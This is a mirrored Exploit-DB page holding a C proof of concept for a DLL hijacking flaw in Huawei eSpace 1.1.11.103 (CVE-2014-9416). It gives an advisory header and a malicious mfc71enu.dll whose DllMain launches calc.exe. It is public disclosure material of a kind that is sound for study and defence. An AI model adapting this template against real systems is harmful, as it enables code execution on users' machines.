bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/46866.c
Offensive Security 44198f828c DB: 2019-05-21 
16 changes to exploits/shellcodes

Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)
Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow
Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow
Encrypt PDF 2.3 - Denial of Service (PoC)
PCL Converter 2.7 - Denial of Service (PoC)
docPrint Pro 8.0 - Denial of Service (PoC)
AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
Huawei eSpace 1.1.11.103 - DLL Hijacking
Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)

eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution

Linux x86_64 - Delete File Shellcode (28 bytes)
2019-05-21 05:02:05 +00:00

53 lines
No EOL
1.6 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

/*
Huawei eSpace Desktop DLL Hijacking Vulnerability
Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huaweis EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.
Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.html, .jpg, .png)
located on a remote WebDAV or SMB share.
Tested on: Microsoft Windows 7 Professional
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
19.08.2014
Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
*/
// gcc -shared -o mfc71enu.dll exploit.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
exec();
return 0;
}
int exec()
{
WinExec("calc.exe" , SW_NORMAL);
return 0;
}
Reference in a new issue View git blame Copy permalink